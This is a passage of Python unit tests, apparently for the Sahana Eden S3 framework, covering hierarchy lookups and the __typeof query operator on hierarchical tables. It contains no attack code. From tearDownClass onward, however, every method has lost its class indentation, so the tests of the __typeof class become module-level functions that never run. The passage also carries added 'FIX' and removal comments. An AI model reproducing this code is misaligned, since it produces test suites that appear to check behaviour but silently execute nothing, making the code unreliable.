        node = uids["LHIERARCHY2-1"]
        root = h.root(node, classify=True)
        assertEqual(root, (uids["LHIERARCHY2"],
                           rows["LHIERARCHY2"].category))

        # Root of root (a root node is its own root)
        node = uids["LHIERARCHY1"]
        root = h.root(node)
        assertEqual(root, uids["LHIERARCHY1"])

        # None
        root = h.root(None)
        assertEqual(root, None)

    # -------------------------------------------------------------------------
    def testSiblings(self):
        """ Test lookup of sibling nodes """

        uids = self.uids
        ids = self.ids
        links = self.links
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_lhierarchy")
        for uid in uids:
            parent = links[uid].parent_id
            # Expected siblings: all nodes whose link points at the same parent
            siblings = set(node for node, _uid in ids.items()
                           if links[_uid].parent_id == parent)
            assertEqual(h.siblings(uids[uid], inclusive=True), siblings)
            siblings.discard(uids[uid])
            assertEqual(h.siblings(uids[uid], inclusive=False), siblings)

    # -------------------------------------------------------------------------
    def testFindAll(self):
        """ Test lookup of descendant nodes """

        uids = self.uids
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_lhierarchy")

        # All descendants, excluding the start node itself
        root = uids["LHIERARCHY1"]
        nodes = h.findall(root)
        expected = ["LHIERARCHY1-1",
                    "LHIERARCHY1-1-1",
                    "LHIERARCHY1-1-2",
                    "LHIERARCHY1-2",
                    "LHIERARCHY1-2-1",
                    "LHIERARCHY1-2-2",
                    ]
        assertEqual(nodes, set(uids[uid] for uid in expected))

        # inclusive=True also includes the start node
        root = uids["LHIERARCHY1"]
        nodes = h.findall(root, inclusive=True)
        expected = ["LHIERARCHY1",
                    "LHIERARCHY1-1",
                    "LHIERARCHY1-1-1",
                    "LHIERARCHY1-1-2",
                    "LHIERARCHY1-2",
                    "LHIERARCHY1-2-1",
                    "LHIERARCHY1-2-2",
                    ]
        assertEqual(nodes, set(uids[uid] for uid in expected))

        # Restricted to a category
        root = uids["LHIERARCHY2"]
        nodes = h.findall(root, category="Cat 1")
        expected = ["LHIERARCHY2-1",
                    ]
        assertEqual(nodes, set(uids[uid] for uid in expected))

        # Non-existent category gives an empty set
        root = uids["LHIERARCHY1"]
        nodes = h.findall(root, category="Cat 4")
        assertEqual(nodes, set())

    # -------------------------------------------------------------------------
    def testFilteringLeafOnly(self):
        """ Test filtering of the tree with leafonly=True """

        uids = self.uids

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue

        # With leafonly=True only leaves matching the filter (and their
        # ancestors) remain in the tree
        h = S3Hierarchy("test_lhierarchy",
                        filter = FS("type") == "D",
                        leafonly = True)

        # Check nodes
        nodes = h.nodes
        expected = ["LHIERARCHY2",
                    "LHIERARCHY2-1",
                    "LHIERARCHY2-1-2"]
        assertEqual(len(nodes), len(expected))
        assertTrue(all(uids[uid] in nodes for uid in expected))

        # Check consistency: every child/parent link stays inside the tree
        for node in nodes.values():
            assertTrue(all(child_id in nodes for child_id in node["s"]))
            parent_id = node["p"]
            if parent_id:
                assertTrue(parent_id in nodes)

    # -------------------------------------------------------------------------
    def testFilteringAnyNode(self):
        """ Test filtering of the tree with leafonly=False """

        uids = self.uids

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue

        # With leafonly=False any matching node (and its ancestors) remains
        h = S3Hierarchy("test_lhierarchy",
                        filter = FS("type") == "C",
                        leafonly = False)

        # Check nodes
        nodes = h.nodes
        expected = ["LHIERARCHY1",
                    "LHIERARCHY1-1",
                    "LHIERARCHY1-2",
                    "LHIERARCHY1-2-2",
                    "LHIERARCHY2",
                    "LHIERARCHY2-1",
                    "LHIERARCHY2-1-1"]
        assertEqual(len(nodes), len(expected))
        assertTrue(all(uids[uid] in nodes for uid in expected))

        # Check consistency: every child/parent link stays inside the tree
        for node in nodes.values():
            assertTrue(all(child_id in nodes for child_id in node["s"]))
            parent_id = node["p"]
            if parent_id:
                assertTrue(parent_id in nodes)
# =============================================================================
class S3TypeOfTests(unittest.TestCase):
    """ Tests for __typeof query operator """

    # -------------------------------------------------------------------------
    @classmethod
    def setUpClass(cls):
        """
        Define the test tables and import the test data.

        Creates a flat lookup table (typeof_nonhierarchy), a hierarchical
        lookup table (typeof_hierarchy, linked via its "parent" field) and
        a table referencing the hierarchy, then imports two hierarchy
        trees (HIERARCHY1*, HIERARCHY2*) from S3XML.
        """

        s3db = current.s3db

        # Flat (non-hierarchical) lookup table
        s3db.define_table("typeof_nonhierarchy",
                          Field("name"),
                          *s3_meta_fields())

        # Hierarchical lookup table; the virtual fields (Field.Method)
        # are used to test the __typeof virtual-field fallbacks
        s3db.define_table("typeof_hierarchy",
                          Field("name"),
                          Field("parent", "reference typeof_hierarchy"),
                          Field("typeof_nonhierarchy_id", "reference typeof_nonhierarchy"),
                          Field("typeof_nonhierarchy_multi_id", "list:reference typeof_nonhierarchy"),
                          Field.Method("vsfield", lambda row: "test"),
                          Field.Method("vmfield", lambda row: ["test1", "test2", "test3"]),
                          *s3_meta_fields())

        # Table referencing the hierarchy (single and multiple)
        s3db.define_table("typeof_hierarchy_reference",
                          Field("typeof_hierarchy_id", "reference typeof_hierarchy"),
                          Field("typeof_hierarchy_multi_id", "list:reference typeof_hierarchy"),
                          *s3_meta_fields())

        # FIX: the multi-reference uuid list must use &quot; entities -
        # literal double quotes inside an attribute value make the XML
        # unparseable and would break etree.fromstring() below
        xmlstr = """
<s3xml>
    <resource name="typeof_nonhierarchy" uuid="NONHIERARCHY1">
        <data field="name">NonHierarchy1</data>
    </resource>
    <resource name="typeof_nonhierarchy" uuid="NONHIERARCHY2">
        <data field="name">NonHierarchy2</data>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1">
        <data field="name">Type 1</data>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1-1">
        <data field="name">Type 1-1</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1"/>
        <reference field="typeof_nonhierarchy_id" resource="typeof_nonhierarchy" uuid="NONHIERARCHY1"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1-1-1">
        <data field="name">Type 1-1-1</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-1"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1-1-2">
        <data field="name">Type 1-1-2</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-1"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1-2">
        <data field="name">Type 1-2</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1-2-1">
        <data field="name">Type 1-2-1</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-2"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY1-2-2">
        <data field="name">Type 1-2-2</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-2"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY2">
        <data field="name">Type 2</data>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY2-1">
        <data field="name">Type 2-1</data>
        <reference field="typeof_nonhierarchy_multi_id" resource="typeof_nonhierarchy"
                   uuid="[&quot;NONHIERARCHY1&quot;,&quot;NONHIERARCHY2&quot;]"/>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY2"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY2-1-1">
        <data field="name">Type 2-1-1</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY2-1"/>
    </resource>
    <resource name="typeof_hierarchy" uuid="HIERARCHY2-1-2">
        <data field="name">Type 2-1-2</data>
        <reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY2-1"/>
    </resource>
</s3xml>
"""

        xmltree = etree.ElementTree(etree.fromstring(xmlstr))

        # Import without authorization checks
        current.auth.override = True
        resource = s3db.resource("typeof_hierarchy")
        resource.import_xml(xmltree)
# -------------------------------------------------------------------------
@classmethod
def tearDownClass(cls):
    # Drop the test tables; the hierarchy table references itself via
    # "parent", hence the cascaded drop
    db = current.db
    db.typeof_hierarchy.drop(mode="cascade")
    db.typeof_hierarchy_reference.drop()
    db.typeof_nonhierarchy.drop()
# -------------------------------------------------------------------------
def setUp(self):

    # Run without authorization checks
    current.auth.override = True

    db = current.db

    # Cache rows/IDs/UUIDs of the hierarchy table (only once per
    # instance, hence the hasattr-guard)
    if not hasattr(self, "rows"):
        rows = db(db.typeof_hierarchy.id>0).select()
        self.rows = {}
        self.uids = {}
        self.ids = {}
        for row in rows:
            uid = row.uuid
            self.rows[uid] = row
            self.uids[uid] = row.id
            self.ids[row.id] = uid

    # Cache record IDs of the flat lookup table
    if not hasattr(self, "lookup_uids"):
        rows = db(db.typeof_nonhierarchy.id>0).select()
        self.lookup_uids = {}
        for row in rows:
            uid = row.uuid
            self.lookup_uids[uid] = row.id

    # (Re-)configure the hierarchy link; individual tests may remove
    # this setting via clear_config
    current.s3db.configure("typeof_hierarchy", hierarchy="parent")

# -------------------------------------------------------------------------
def tearDown(self):

    # Restore authorization checks
    current.auth.override = False
# -------------------------------------------------------------------------
def testTypeOfReferenceSingle(self):
    """
    Test resolution of __typeof queries, for field in referencing
    table, with single value
    """
    # (removed unused local: db)
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with field in referencing table: __typeof must resolve into
    # a belongs-query over the node itself and all its descendants
    expr = FS("typeof_hierarchy_id").typeof(uids["HIERARCHY1"])
    query = expr.query(resource)

    table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY1",
                                         "HIERARCHY1-1",
                                         "HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         "HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         ))
    expected_query = table.typeof_hierarchy_id.belongs(expected)

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfReferenceMultiple(self):
    """
    Test resolution of __typeof queries, for field in referencing
    table, with multiple values
    """
    # (removed unused local: db)
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with field in referencing table: the subtrees of all given
    # nodes are merged into a single belongs-query
    expr = FS("typeof_hierarchy_id").typeof((uids["HIERARCHY1-2"],
                                             uids["HIERARCHY2-1"],
                                             ))
    query = expr.query(resource)

    table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         "HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    expected_query = table.typeof_hierarchy_id.belongs(expected)

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfReferenceNone(self):
    """
    Test resolution of __typeof queries, for field in referencing
    table, with None value
    """
    # (removed unused local db, and two dead "expected" set builds that
    # were never used by the IS-NULL expected queries)
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")
    table = resource.table

    # Test with None: resolves to an IS NULL query
    expr = FS("typeof_hierarchy_id").typeof(None)
    query = expr.query(resource)
    expected_query = (table.typeof_hierarchy_id == None)
    self.assertEquivalent(query, expected_query)

    # Test with a list containing only None: still IS NULL
    expr = FS("typeof_hierarchy_id").typeof([None])
    query = expr.query(resource)
    expected_query = (table.typeof_hierarchy_id == None)
    self.assertEquivalent(query, expected_query)

    # Test with multiple values incl. None: subtree-belongs OR IS NULL
    expr = FS("typeof_hierarchy_id").typeof([None, uids["HIERARCHY1-2"]])
    query = expr.query(resource)
    expected = set(uids[uid] for uid in ("HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         ))
    expected_query = (table.typeof_hierarchy_id.belongs(expected)) | \
                     (table.typeof_hierarchy_id == None)
    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfReferenceNoHierarchy(self):
    """
    Test resolution of __typeof queries, for field in referencing
    table, with no hierarchy configured
    """
    # (removed unused local: db)
    uids = self.uids

    # Remove hierarchy setting
    current.s3db.clear_config("typeof_hierarchy", "hierarchy")

    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Without a hierarchy, a single value degrades to plain equality
    expr = FS("typeof_hierarchy_id").typeof(uids["HIERARCHY1-2"])
    query = expr.query(resource)
    expected = uids["HIERARCHY1-2"]
    expected_query = resource.table.typeof_hierarchy_id == expected
    self.assertEquivalent(query, expected_query)

    # ...and multiple values degrade to a plain belongs-query
    expr = FS("typeof_hierarchy_id").typeof((uids["HIERARCHY1-2"],
                                             uids["HIERARCHY2-1"]
                                             ))
    query = expr.query(resource)
    expected = set(uids[uid] for uid in ("HIERARCHY1-2",
                                         "HIERARCHY2-1",
                                         ))
    expected_query = resource.table.typeof_hierarchy_id.belongs(expected)
    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableSingle(self):
    """
    Test resolution of __typeof queries, for field in lookup table,
    with single value
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with field in hierarchy table: the name is resolved to its
    # node, then expanded into the node's ID plus all descendant IDs
    expr = FS("typeof_hierarchy_id$name").typeof("Type 1")
    query = expr.query(resource)

    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY1",
                                         "HIERARCHY1-1",
                                         "HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         "HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         ))
    expected_query = table.id.belongs(expected)

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableMultiple(self):
    """
    Test resolution of __typeof queries, for field in lookup table,
    with multiple values
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with field in hierarchy table: both names resolve and both
    # subtrees are merged into a single belongs-query
    expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-2", "Type 2-1"))
    query = expr.query(resource)

    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         "HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    expected_query = table.id.belongs(expected)

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableSingleWildcard(self):
    """
    Test resolution of __typeof queries, for field in lookup table,
    with single value with wildcards
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with field in hierarchy table, with wildcard: matches
    # "Type 1-1" and "Type 1-2" (but not "Type 1" itself), and expands
    # their subtrees
    expr = FS("typeof_hierarchy_id$name").typeof("Type 1-*")
    query = expr.query(resource)

    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY1-1",
                                         "HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         "HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         ))
    expected_query = table.id.belongs(expected)

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableMultipleWildcard(self):
    """
    Test resolution of __typeof queries, for field in lookup table,
    with multiple values with wildcards
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with field in hierarchy table, with wildcards: the union of
    # all matching nodes' subtrees is expected
    expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-1-*", "Type 2-1*"))
    query = expr.query(resource)

    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         "HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    expected_query = table.id.belongs(expected)

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableSingleUnresolvable(self):
    """
    Test resolution of __typeof queries, for field in lookup table,
    with unresolvable value
    """
    # (removed unused local: uids)
    db = current.db
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # A wildcard pattern matching no node name must resolve into an
    # empty belongs-query (matching nothing) rather than fail
    expr = FS("typeof_hierarchy_id$name").typeof("Type 1-3*")
    query = expr.query(resource)

    table = db.typeof_hierarchy
    expected_query = table.id.belongs(set())

    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableNone(self):
    """
    Test resolution of __typeof queries, for field in lookup table,
    with None value
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with None: no name can match => empty belongs-query
    expr = FS("typeof_hierarchy_id$name").typeof(None)
    query = expr.query(resource)
    table = db.typeof_hierarchy
    expected_query = table.id.belongs(set())
    self.assertEquivalent(query, expected_query)

    # Test with list containing only None: same result
    expr = FS("typeof_hierarchy_id$name").typeof([None])
    query = expr.query(resource)
    #table = db.typeof_hierarchy
    expected_query = table.id.belongs(set())
    self.assertEquivalent(query, expected_query)

    # Test with multiple values: None is ignored, the remaining name
    # resolves to a single (leaf) node => plain equality
    expr = FS("typeof_hierarchy_id$name").typeof([None, "Type 1-1-2"])
    query = expr.query(resource)
    #table = db.typeof_hierarchy
    expected_query = (table.id == uids["HIERARCHY1-1-2"])
    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableReference(self):
    """
    Test resolution of __typeof queries, for reference field
    in lookup table
    """
    db = current.db
    uids = self.uids
    lookup_uids = self.lookup_uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with single value
    lookup = lookup_uids["NONHIERARCHY1"]
    expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_id").typeof(lookup)
    query = expr.query(resource)
    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY1-1",
                                         "HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         ))
    expected_query = table.id.belongs(expected)
    # FIX: this assertion was missing, so the single-value case was
    # never actually verified
    self.assertEquivalent(query, expected_query)

    # Test with multiple values
    lookup = (lookup_uids["NONHIERARCHY1"],
              lookup_uids["NONHIERARCHY2"])
    expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_id").typeof(lookup)
    query = expr.query(resource)
    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY1-1",
                                         "HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         ))
    expected_query = table.id.belongs(expected)
    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableListReference(self):
    """
    Test resolution of __typeof queries, for list:reference field
    in lookup table
    """
    db = current.db
    uids = self.uids
    lookup_uids = self.lookup_uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with single value
    lookup = lookup_uids["NONHIERARCHY1"]
    expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_multi_id").typeof(lookup)
    query = expr.query(resource)
    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    expected_query = table.id.belongs(expected)
    # FIX: this assertion was missing, so the single-value case was
    # never actually verified
    self.assertEquivalent(query, expected_query)

    # Test with multiple values
    lookup = (lookup_uids["NONHIERARCHY1"],
              lookup_uids["NONHIERARCHY2"])
    expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_multi_id").typeof(lookup)
    query = expr.query(resource)
    table = db.typeof_hierarchy
    expected = set(uids[uid] for uid in ("HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    expected_query = table.id.belongs(expected)
    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableNoHierarchy(self):
    """
    Test resolution of __typeof queries, for field in lookup
    table, with no hierarchy configured
    """
    # (removed unused local: uids)
    db = current.db

    # Remove hierarchy setting
    current.s3db.clear_config("typeof_hierarchy", "hierarchy")

    resource = current.s3db.resource("typeof_hierarchy_reference")
    table = db.typeof_hierarchy

    # Without a hierarchy, a single name degrades to plain equality
    expr = FS("typeof_hierarchy_id$name").typeof("Type 1-2")
    query = expr.query(resource)
    expected_query = (table.name == "Type 1-2")
    self.assertEquivalent(query, expected_query)

    # ...multiple names degrade to a belongs-query
    expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-2", "Type 2-1"))
    query = expr.query(resource)
    expected_query = table.name.belongs(("Type 1-2", "Type 2-1"))
    self.assertEquivalent(query, expected_query)

    # ...and wildcards become like-queries, OR-ed with the plain values
    expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-*", "Type 2-1"))
    query = expr.query(resource)
    expected_query = (table.name.like("Type 1-%")) | \
                     (table.name == "Type 2-1")
    self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfListReferenceSingle(self):
    """
    Test resolution of __typeof queries, for list:reference,
    with single value
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with single value: for a list:reference the subtree must
    # expand into an OR of CONTAINS sub-queries, one per node
    expr = FS("typeof_hierarchy_multi_id").typeof(uids["HIERARCHY1"])
    query = expr.query(resource)

    table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY1",
                                         "HIERARCHY1-1",
                                         "HIERARCHY1-1-1",
                                         "HIERARCHY1-1-2",
                                         "HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         ))
    found = self.inspect_multi_query(query,
                                     field = table.typeof_hierarchy_multi_id,
                                     conjunction = db._adapter.OR,
                                     op = db._adapter.CONTAINS)
    self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testTypeOfListReferenceMultiple(self):
    """
    Test resolution of __typeof queries, for list:reference,
    with multiple values
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with multiple values: both subtrees become CONTAINS
    # sub-queries combined by OR
    expr = FS("typeof_hierarchy_multi_id").typeof((uids["HIERARCHY1-2"],
                                                   uids["HIERARCHY2-1"]))
    query = expr.query(resource)

    table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY1-2",
                                         "HIERARCHY1-2-1",
                                         "HIERARCHY1-2-2",
                                         "HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    found = self.inspect_multi_query(query,
                                     field = table.typeof_hierarchy_multi_id,
                                     conjunction = db._adapter.OR,
                                     op = db._adapter.CONTAINS)
    self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testTypeOfListReferenceNone(self):
    """
    Test resolution of __typeof queries, for list:reference,
    with None value
    """
    db = current.db
    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with None: nothing can match => empty belongs-query
    expr = FS("typeof_hierarchy_multi_id").typeof(None)
    query = expr.query(resource)
    table = resource.table
    expected_query = table.id.belongs(set())
    self.assertEquivalent(query, expected_query)

    # Test with list containing only None: same result
    expr = FS("typeof_hierarchy_multi_id").typeof([None])
    query = expr.query(resource)
    #table = resource.table
    expected_query = table.id.belongs(set())
    self.assertEquivalent(query, expected_query)

    # Test with multiple values: None is ignored, the remaining node's
    # subtree expands into CONTAINS sub-queries
    expr = FS("typeof_hierarchy_multi_id").typeof((None,
                                                   uids["HIERARCHY2-1"]))
    query = expr.query(resource)
    #table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY2-1",
                                         "HIERARCHY2-1-1",
                                         "HIERARCHY2-1-2",
                                         ))
    found = self.inspect_multi_query(query,
                                     field = table.typeof_hierarchy_multi_id,
                                     conjunction = db._adapter.OR,
                                     op = db._adapter.CONTAINS)
    self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testTypeOfListReferenceNoHierarchy(self):
    """
    Test resolution of __typeof queries, for list:reference,
    with single value
    """
    db = current.db
    uids = self.uids

    # Remove hierarchy setting
    current.s3db.clear_config("typeof_hierarchy", "hierarchy")

    resource = current.s3db.resource("typeof_hierarchy_reference")

    # Test with single value: without a hierarchy there is no subtree
    # expansion - just a containment query for the value itself
    expr = FS("typeof_hierarchy_multi_id").typeof(uids["HIERARCHY1"])
    query = expr.query(resource)
    table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY1",))
    found = self.inspect_multi_query(query,
                                     field = table.typeof_hierarchy_multi_id,
                                     conjunction = db._adapter.OR,
                                     op = db._adapter.CONTAINS)
    self.assertEqual(found, expected)

    # Test with multiple values: one containment query per given value
    expr = FS("typeof_hierarchy_multi_id").typeof((uids["HIERARCHY1-2"],
                                                   uids["HIERARCHY2-1"]))
    query = expr.query(resource)
    table = resource.table
    expected = set(uids[uid] for uid in ("HIERARCHY1-2",
                                         "HIERARCHY2-1",
                                         ))
    found = self.inspect_multi_query(query,
                                     field = table.typeof_hierarchy_multi_id,
                                     conjunction = db._adapter.OR,
                                     op = db._adapter.CONTAINS)
    self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testVirtualFieldSingle(self):
    """ Test fallbacks for __typeof with single value virtual field """

    resource = current.s3db.resource("typeof_hierarchy")
    row = self.rows["HIERARCHY1"]

    # vsfield is a Field.Method that always returns "test" (see
    # setUpClass); __typeof falls back to simple matching here
    expr = FS("vsfield").typeof("test")
    result = expr(resource, row, virtual=True)
    self.assertTrue(result)

    expr = FS("vsfield").typeof("other")
    result = expr(resource, row, virtual=True)
    self.assertFalse(result)

    # With a list of values, any single match suffices
    expr = FS("vsfield").typeof(["test", "test1", "test2"])
    result = expr(resource, row, virtual=True)
    self.assertTrue(result)

    expr = FS("vsfield").typeof(["other", "other1", "other2"])
    result = expr(resource, row, virtual=True)
    self.assertFalse(result)
# -------------------------------------------------------------------------
def testVirtualFieldMultiple(self):
    """ Test fallbacks for __typeof with multi-value virtual field """

    resource = current.s3db.resource("typeof_hierarchy")
    row = self.rows["HIERARCHY2"]

    # vmfield is a Field.Method returning ["test1", "test2", "test3"]
    # (see setUpClass)
    expr = FS("vmfield").typeof("test1")
    result = expr(resource, row, virtual=True)
    self.assertTrue(result)

    expr = FS("vmfield").typeof("other")
    result = expr(resource, row, virtual=True)
    self.assertFalse(result)

    # Any overlap between field values and given values matches
    expr = FS("vmfield").typeof(["test1", "other"])
    result = expr(resource, row, virtual=True)
    self.assertTrue(result)

    expr = FS("vmfield").typeof(["other1", "other2"])
    result = expr(resource, row, virtual=True)
    self.assertFalse(result)
# -------------------------------------------------------------------------
def testHierarchyFilterTypeOf(self):
    """ Test S3HierarchyFilter recognition of typeof queries """
    # (removed two dead "expected = set(ids)" assignments: they built a
    # set of the *characters* of the ID string and were never used)

    uids = self.uids
    resource = current.s3db.resource("typeof_hierarchy_reference")
    filter_widget = S3HierarchyFilter("typeof_hierarchy_id")

    # Test with belongs on filter field: values are taken as-is
    ids = str(uids["HIERARCHY1-1"])
    get_vars = {"~.typeof_hierarchy_id__belongs": ids}
    variable = filter_widget.variable(resource, get_vars)
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(values, [ids])

    # Test with typeof on filter field: expands into the node's subtree
    ids = str(uids["HIERARCHY1-1"])
    get_vars = {"~.typeof_hierarchy_id__typeof": ids}
    variable = filter_widget.variable(resource, get_vars)
    expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
                                              "HIERARCHY1-1-1",
                                              "HIERARCHY1-1-2",
                                              ))
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(set(values), expected)

    # Test with typeof on filter field, multiple values incl. None
    ids = ",".join(str(_id) for _id in (uids["HIERARCHY1-1"],
                                        uids["HIERARCHY2-1"],
                                        None))
    get_vars = {"~.typeof_hierarchy_id__typeof": ids}
    variable = filter_widget.variable(resource, get_vars)
    expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
                                              "HIERARCHY1-1-1",
                                              "HIERARCHY1-1-2",
                                              "HIERARCHY2-1",
                                              "HIERARCHY2-1-1",
                                              "HIERARCHY2-1-2",
                                              ))
    expected.add(None)
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(set(values), expected)

    # Test with typeof on field in lookup table
    get_vars = {"~.typeof_hierarchy_id$name__typeof": "Type 1-1"}
    variable = filter_widget.variable(resource, get_vars)
    expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
                                              "HIERARCHY1-1-1",
                                              "HIERARCHY1-1-2",
                                              ))
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(set(values), expected)

    # Test with typeof on field in lookup table, multiple values
    get_vars = {"~.typeof_hierarchy_id$name__typeof": "Type 1-1,Type 2-1"}
    variable = filter_widget.variable(resource, get_vars)
    expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
                                              "HIERARCHY1-1-1",
                                              "HIERARCHY1-1-2",
                                              "HIERARCHY2-1",
                                              "HIERARCHY2-1-1",
                                              "HIERARCHY2-1-2",
                                              ))
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(set(values), expected)

    # Test with typeof on field in lookup table, unresolvable
    get_vars = {"~.typeof_hierarchy_id$name__typeof": "Type 1-3"}
    variable = filter_widget.variable(resource, get_vars)
    expected = set()
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(set(values), expected)

    # Test with typeof on field in lookup table, None
    get_vars = {"~.typeof_hierarchy_id$name__typeof": "None"}
    variable = filter_widget.variable(resource, get_vars)
    expected = set()
    values = filter_widget._values(get_vars, variable)
    self.assertEqual(set(values), expected)

    # Test preference of belongs in mixed queries
    ids = str(uids["HIERARCHY1-1"])
    get_vars = {"~.typeof_hierarchy_id__belongs": ids,
